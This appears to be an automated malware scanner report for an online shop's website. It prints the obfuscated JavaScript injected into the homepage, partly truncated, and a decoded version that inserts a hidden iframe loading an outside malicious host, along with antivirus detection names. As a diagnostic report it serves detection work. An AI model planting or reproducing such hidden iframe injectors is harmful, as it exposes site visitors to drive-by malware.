New scan:

Malware Scanner report for moonlight-shop24.de

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "moonlight-shop24.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=moonlight-shop24.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://moonlight-shop24.de/
200 OK
Content-Length: 28825
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["substr"](2);}w=this;e=w[f.substr(11)+zz];t='y';}
n="3.5!3.5!51.5!50!15!19!49!54.5!48.5!57.5!53.5!49.5!54!57!22!50.5!49.5!57!33.5!53!49.5!53.5!49.5!54!57!56.5!32!59.5!41!47.5!50.5!38!47.5!53.5!49.5!19!18.5!48!54.5!49!59.5!18.5!19.5!44.5!23!45.5!19.5!60.5!5.5!3.5!3.5!3.5!51.5!50!56!47.5!53.5!49.5!56!19!19.5!28.5!5.5!3.5!3.5!61.5!15!
... 1847 bytes are skipped ...
0!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!51!49.5!51.5!50.5!51!57!18.5!21!18.5!23.5!23!18.5!19.5!28.5!5.5!3.5!3.5!3.5!49!54.5!48.5!57.5!53.5!49.5!54!57!22!50.5!49.5!57!33.5!53!49.5!53.5!49.5!54!57!56.5!32!59.5!41!47.5!50.5!38!47.5!53.5!49.5!19!18.5!48!54.5!49!59.5!18.5!19.5!44.5!23!45.5!22!47.5!55!55!49.5!54!49!32.5!51!51.5!53!49!19!50!19.5!28.5!5.5!3.5!3.5!61.5"["split"]("a!".substr(1));for(i=6-2-1-2-1;i!=613;i++){j=i;if(st)ss=ss+st[f](-h*(1+1*n[j]));}if(zz)q=ss;if(t)e(""+q);

Decoded script:


if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://myiiphones.com/main.php?page=4848dc5890a4c352' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://myiiphones.com/main.php?page=4848dc5890a4c352');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.t
... 439 bytes are skipped ...
ocument.createElement('iframe');f.setAttribute('src','http://myiiphones.com/main.php?page=4848dc5890a4c352');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
<iframe src='http://myiiphones.com/main.php?page=4848dc5890a4c352' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Iframe.A
K7AntiVirus
Riskware
Emsisoft
JS:Trojan.Iframe.A (B)
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
JS.IFrame.151
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Iframe.V
MicroWorld-eScan
JS:Trojan.Iframe.A
NANO-Antivirus
Trojan.Script.Iframe.rpyhz
F-Secure
JS:Trojan.Iframe.A
F-Prot
JS/IFrame.HC.gen
Norman
IframeRef.DM
GData
JS:Trojan.Iframe.A
Commtouch
JS/IFrame.HC.gen
BitDefender
JS:Trojan.Iframe.A

http://moonlight-shop24.de/gm_javascript.js.php?XTCsid=e584620ca45ab0ab80ce67d434ca0de9&page=
404 Not Found
Content-Length: 1363
Content-Type: text/html
clean
http://moonlight-shop24.de/test404page.js
404 Not Found
Content-Length: 1363
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: moonlight-shop24.de

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 09 Jul 2014 01:17:09 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=iso-8859-15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: XTCsid=e584620ca45ab0ab80ce67d434ca0de9; path=/; domain=.moonlight-shop24.de
X-Powered-By: PHP/5.4.30
Second query (visit from search engine):
GET / HTTP/1.1
Host: moonlight-shop24.de
Referer: http://www.google.com/search?q=moonlight-shop24.de

Result:
The result is similar to the first query. There are no suspicious redirects found.